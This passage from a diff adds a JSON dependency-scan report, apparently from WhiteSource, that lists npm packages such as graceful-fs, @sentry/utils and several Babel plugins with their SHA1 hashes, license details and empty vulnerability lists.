"homePage": "https://github.com/isaacs/node-graceful-fs#readme", + "genericPackageIndex": "https://www.npmjs.org/package/graceful-fs" + }, + "matchType": "SHA1", + "sha1": "4a12ff1b60376ef09862c2093edd908328be8423", + "name": "graceful-fs-4.2.3.tgz", + "artifactId": "graceful-fs-4.2.3.tgz", + "version": "4.2.3", + "groupId": "graceful-fs", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2513d93a-aa5b-4e3e-b138-ac8b57a6681a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1920cd69-9600-4629-ad22-203089f410a5", + "keyId": 28650439, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/utils/-/utils-5.8.0.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/utils", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/utils" + }, + "matchType": "SHA1", + "sha1": "34683088159b9935f973b6e6cad1a1cc26bbddac", + "name": "utils-5.8.0.tgz", + "artifactId": "utils-5.8.0.tgz", + "version": "5.8.0", + "groupId": "@sentry/utils", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a5d229cd-09a2-472a-a9a5-12f99153cf71" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f4b099a7-3ccb-40db-a994-c3294e990560", + "keyId": 28670265, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/json-schema-typed/-/json-schema-typed-7.0.2.tgz", + "homePage": "https://github.com/typeslick/json-schema-typed", + "genericPackageIndex": "https://www.npmjs.org/package/json-schema-typed" + }, + "matchType": "SHA1", + "sha1": "926deb7535cfb321613ee136eaed70c1419c89b4", + "name": "json-schema-typed-7.0.2.tgz", + "artifactId": "json-schema-typed-7.0.2.tgz", + "version": "7.0.2", + "groupId": "json-schema-typed", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/869e4f60-bf06-4fa8-8b89-88fc6d505fcd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2ff59dc0-9477-4a56-a601-d17289d64232", + "keyId": 26948751, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "homePage": "https://github.com/npm/wrappy", + "genericPackageIndex": "https://www.npmjs.org/package/wrappy" + }, + "matchType": "SHA1", + "sha1": "b5243d8f3ec1aa35f1364605bc0d1036e30ab69f", + "name": "wrappy-1.0.2.tgz", + "artifactId": "wrappy-1.0.2.tgz", + "version": "1.0.2", + "groupId": "wrappy", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/wrappy" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d2d0e9ed-e37d-460a-a6f0-1ed6347a6a98", + "keyId": 28652867, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-9.7.1.tgz", + "homePage": "https://github.com/postcss/autoprefixer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/autoprefixer" + }, + "matchType": "SHA1", + "sha1": "9ffc44c55f5ca89253d9bb7186cefb01ef57747f", + "name": "autoprefixer-9.7.1.tgz", + "artifactId": "autoprefixer-9.7.1.tgz", + "version": "9.7.1", + "groupId": "autoprefixer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/autoprefixer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0a804197-382b-4db0-bfab-4d1ae4c7e061", + "keyId": 28586031, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-modules-commonjs" + }, + "matchType": "SHA1", + "sha1": "3e5ffb4fd8c947feede69cbe24c9554ab4113fe3", + "name": "plugin-transform-modules-commonjs-7.7.0.tgz", + "artifactId": "plugin-transform-modules-commonjs-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-modules-commonjs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/96cbca3e-6ba7-46a0-ac25-754babc7b026" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2cc8e528-3c61-4ecd-b6be-ce48e4972783", + "keyId": 28652825, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-initial/-/postcss-initial-3.0.2.tgz", + "homePage": "https://github.com/maximkoretskiy/postcss-initial#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-initial" + }, + "matchType": "SHA1", + "sha1": "f018563694b3c16ae8eaabe3c585ac6319637b2d", + "name": "postcss-initial-3.0.2.tgz", + "artifactId": "postcss-initial-3.0.2.tgz", + "version": "3.0.2", + "groupId": "postcss-initial", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/94cc0ce5-2510-4ed2-b405-d460ad192b57" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e460c1c9-a28f-495f-8834-5ba59203871b", + "keyId": 28586029, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-hoist-variables" + }, + "matchType": "SHA1", + "sha1": "b4552e4cfe5577d7de7b183e193e84e4ec538c81", + "name": "helper-hoist-variables-7.7.0.tgz", + "artifactId": "helper-hoist-variables-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-hoist-variables", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2a75297e-2f47-4dfe-8285-0e2c81dcfe42" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "76405ae9-c720-40d7-8cdc-99c15903be54", + "keyId": 26948696, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "homePage": "https://github.com/isaacs/fs.realpath#readme", + "genericPackageIndex": "https://www.npmjs.org/package/fs.realpath" + }, + "matchType": "SHA1", + "sha1": "1504ad2523158caa40db4a2787cb01411994ea4f", + "name": "fs.realpath-1.0.0.tgz", + "artifactId": "fs.realpath-1.0.0.tgz", + "version": "1.0.0", + "groupId": "fs.realpath", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/53919508-ad6f-46bf-a319-f68a3dfab715" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "21cb72f4-718c-418f-af5f-48456a783f7c", + "keyId": 27623282, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unique-slug/-/unique-slug-2.0.2.tgz", + "homePage": "https://github.com/iarna/unique-slug#readme", + "genericPackageIndex": "https://www.npmjs.org/package/unique-slug" + }, + "matchType": "SHA1", + "sha1": "baabce91083fc64e945b0f3ad613e264f7cd4e6c", + "name": "unique-slug-2.0.2.tgz", + "artifactId": "unique-slug-2.0.2.tgz", + "version": "2.0.2", + "groupId": "unique-slug", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/unique-slug" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0e258ffa-7a21-41ed-ba29-76b32ad30d72", + "keyId": 26973524, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mississippi/-/mississippi-3.0.0.tgz", + "homePage": "https://github.com/maxogden/mississippi#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mississippi" + }, + "matchType": "SHA1", + "sha1": "ea0a3291f97e0b5e8776b363d5f0a12d94c67022", + "name": "mississippi-3.0.0.tgz", + "artifactId": "mississippi-3.0.0.tgz", + "version": "3.0.0", + "groupId": "mississippi", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mississippi/v/3.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "32045c47-86e6-41f5-adc3-829b265fd907", + "keyId": 28574427, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/dot-prop/-/dot-prop-5.2.0.tgz", + "homePage": "https://github.com/sindresorhus/dot-prop#readme", + "genericPackageIndex": "https://www.npmjs.org/package/dot-prop" + }, + "matchType": "SHA1", + "sha1": "c34ecc29556dc45f1f4c22697b6f4904e0cc4fcb", + "name": "dot-prop-5.2.0.tgz", + "artifactId": "dot-prop-5.2.0.tgz", + "version": "5.2.0", + "groupId": "dot-prop", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/aadbaa79-624b-4f0b-a6e4-e9007be15b32" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3c2b76de-edda-48fe-b473-2b640345fad8", + "keyId": 28670267, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ts-pnp/-/ts-pnp-1.1.5.tgz", + "homePage": "https://github.com/arcanis/ts-pnp", + "genericPackageIndex": "https://www.npmjs.org/package/ts-pnp" + }, + "matchType": "SHA1", + "sha1": "840e0739c89fce5f3abd9037bb091dbff16d9dec", + "name": "ts-pnp-1.1.5.tgz", + "artifactId": "ts-pnp-1.1.5.tgz", + "version": "1.1.5", + "groupId": "ts-pnp", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ts-pnp" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f8bfdcff-264b-4cef-b926-e7f576e4ffa1", + "keyId": 28660200, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/copy-webpack-plugin/-/copy-webpack-plugin-5.0.5.tgz", + "homePage": "https://github.com/webpack-contrib/copy-webpack-plugin", + "genericPackageIndex": "https://www.npmjs.org/package/copy-webpack-plugin" + }, + "matchType": "SHA1", + "sha1": "731df6a837a2ef0f8f8e2345bdfe9b7c62a2da68", + "name": "copy-webpack-plugin-5.0.5.tgz", + "artifactId": "copy-webpack-plugin-5.0.5.tgz", + "version": "5.0.5", + "groupId": "copy-webpack-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/copy-webpack-plugin/v/5.0.5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4b0dcc12-396d-43a2-ab04-897bbea9589a", + "keyId": 28652951, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-typescript/-/plugin-transform-typescript-7.7.2.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-typescript" + }, + "matchType": "SHA1", + "sha1": "eb9f14c516b5d36f4d6f3a9d7badae6d0fc313d4", + "name": "plugin-transform-typescript-7.7.2.tgz", + "artifactId": "plugin-transform-typescript-7.7.2.tgz", + "version": "7.7.2", + "groupId": "@babel/plugin-transform-typescript", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/295a2b71-d1cf-440c-bfac-98ec779ac693" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c51a3790-89dd-4eef-a3aa-23b9f25d9e5d", + "keyId": 28586074, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.7.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-simple-access" + }, + "matchType": "SHA1", + "sha1": "97a8b6c52105d76031b86237dc1852b44837243d", + "name": "helper-simple-access-7.7.0.tgz", + "artifactId": "helper-simple-access-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-simple-access", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-simple-access" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5b186593-70c7-4371-ae60-a22b48d6600e", + "keyId": 26955471, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/promise-inflight/-/promise-inflight-1.0.1.tgz", + "homePage": "https://github.com/iarna/promise-inflight#readme", + "genericPackageIndex": "https://www.npmjs.org/package/promise-inflight" + }, + "matchType": "SHA1", + "sha1": "98472870bf228132fcbdd868129bad12c3c029e3", + "name": "promise-inflight-1.0.1.tgz", + "artifactId": "promise-inflight-1.0.1.tgz", + "version": "1.0.1", + "groupId": "promise-inflight", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/promise-inflight" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "48ab96eb-0eef-4cca-b3c0-ff46d7ca6ef9", + "keyId": 28586070, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-proposal-async-generator-functions/-/plugin-proposal-async-generator-functions-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-proposal-async-generator-functions" + }, + "matchType": "SHA1", + "sha1": "83ef2d6044496b4c15d8b4904e2219e6dccc6971", + "name": "plugin-proposal-async-generator-functions-7.7.0.tgz", + "artifactId": "plugin-proposal-async-generator-functions-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-proposal-async-generator-functions", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-proposal-async-generator-functions" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cc75dde1-53b4-43b3-b9af-938324f91e9b", + "keyId": 27023438, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/through2/-/through2-2.0.5.tgz", + "homePage": "https://github.com/rvagg/through2#readme", + "genericPackageIndex": "https://www.npmjs.org/package/through2" + }, + "matchType": "SHA1", + "sha1": "01c1e39eb31d07cb7d03a96a70823260b23132cd", + "name": "through2-2.0.5.tgz", + "artifactId": "through2-2.0.5.tgz", + "version": "2.0.5", + "groupId": "through2", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/through2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "eeda9591-d954-45f5-b8b0-14b0e4caad06", + "keyId": 28586027, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-define-map/-/helper-define-map-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-define-map" + }, + "matchType": "SHA1", + "sha1": "60b0e9fd60def9de5054c38afde8c8ee409c7529", + "name": "helper-define-map-7.7.0.tgz", + "artifactId": "helper-define-map-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-define-map", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8f7f540d-cf08-43d1-affc-74938d387cfb" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7442576c-627e-4897-b12d-b4001ecde064", + "keyId": 26948467, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.0.tgz", + "homePage": "https://github.com/mafintosh/stream-shift", + "genericPackageIndex": "https://www.npmjs.org/package/stream-shift" + }, + "matchType": "SHA1", + "sha1": "d5c752825e5367e786f78e18e445ea223a155952", + "name": "stream-shift-1.0.0.tgz", + "artifactId": "stream-shift-1.0.0.tgz", + "version": "1.0.0", + "groupId": "stream-shift", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/55ee6c06-1062-4869-a6e0-30ecf6431c72" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8d955345-10c2-4e10-8410-dc8b1048c21d", + "keyId": 28535020, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.16.tgz", + "homePage": "https://github.com/evanw/node-source-map-support#readme", + "genericPackageIndex": "https://www.npmjs.org/package/source-map-support" + }, + "matchType": "SHA1", + "sha1": "0ae069e7fe3ba7538c64c98515e35339eac5a042", + "name": "source-map-support-0.5.16.tgz", + "artifactId": "source-map-support-0.5.16.tgz", + "version": "0.5.16", + "groupId": "source-map-support", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/source-map-support/v/0.5.16" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c7cd943b-6441-4ef6-af72-d5318670bf84", + "keyId": 28481145, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react-is/-/react-is-16.11.0.tgz", + "homePage": "https://reactjs.org/", + "genericPackageIndex": "https://www.npmjs.org/package/react-is" + }, + "matchType": "SHA1", + "sha1": "b85dfecd48ad1ce469ff558a882ca8e8313928fa", + "name": "react-is-16.11.0.tgz", + "artifactId": "react-is-16.11.0.tgz", + "version": "16.11.0", + "groupId": "react-is", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/react-is/v/16.11.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4f5c7be7-ec47-4aa1-964b-57f05d8d1562", + "keyId": 28586056, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-unicode-regex" + }, + "matchType": "SHA1", + "sha1": "743d9bcc44080e3cc7d49259a066efa30f9187a3", + "name": "plugin-transform-unicode-regex-7.7.0.tgz", + "artifactId": "plugin-transform-unicode-regex-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/plugin-transform-unicode-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4ef46806-14ad-48a4-9a29-06fdeb3f398b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e78b255a-ae83-4946-ae7a-74373e807acb", + "keyId": 27961631, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cacache/-/cacache-12.0.3.tgz", + "homePage": "https://github.com/npm/cacache#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cacache" + }, + "matchType": "SHA1", + "sha1": "be99abba4e1bf5df461cd5a2c1071fc432573390", + "name": "cacache-12.0.3.tgz", + "artifactId": "cacache-12.0.3.tgz", + "version": "12.0.3", + "groupId": "cacache", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/18a822c3-9d8b-440c-a601-eb28d0020cbc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "685a6dd6-6e67-47f9-a47a-9f136d8011ec", + "keyId": 26955381, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pump/-/pump-2.0.1.tgz", + "homePage": "https://github.com/mafintosh/pump#readme", + "genericPackageIndex": "https://www.npmjs.org/package/pump" + }, + "matchType": "SHA1", + "sha1": "12399add6e4cf7526d973cbc8b5ce2e2908b3909", + "name": "pump-2.0.1.tgz", + "artifactId": "pump-2.0.1.tgz", + "version": "2.0.1", + "groupId": "pump", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/pump" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "73eca4de-a415-49e1-a52e-9c0a9e863e7d", + "keyId": 28582969, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-split-export-declaration" + }, + "matchType": "SHA1", + "sha1": "1365e74ea6c614deeb56ebffabd71006a0eb2300", + "name": "helper-split-export-declaration-7.7.0.tgz", + "artifactId": "helper-split-export-declaration-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-split-export-declaration", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-split-export-declaration/v/7.7.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "451d5e2e-7204-4b4d-9db3-3c3abdaa8543", + "keyId": 28650440, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/core/-/core-5.8.0.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/core", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/core" + }, + "matchType": "SHA1", + "sha1": "bbfd2f4711491951a8e3a0e8fa8b172fdf7bff6f", + "name": "core-5.8.0.tgz", + "artifactId": "core-5.8.0.tgz", + "version": "5.8.0", + "groupId": "@sentry/core", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/441d1dd1-65ed-4be6-a199-15a029dc4364" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "09023b5e-a0cd-4b0d-aa44-d8e59346a360", + "keyId": 26954871, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/aproba/-/aproba-1.2.0.tgz", + "homePage": "https://github.com/iarna/aproba", + "genericPackageIndex": "https://www.npmjs.org/package/aproba" + }, + "matchType": "SHA1", + "sha1": 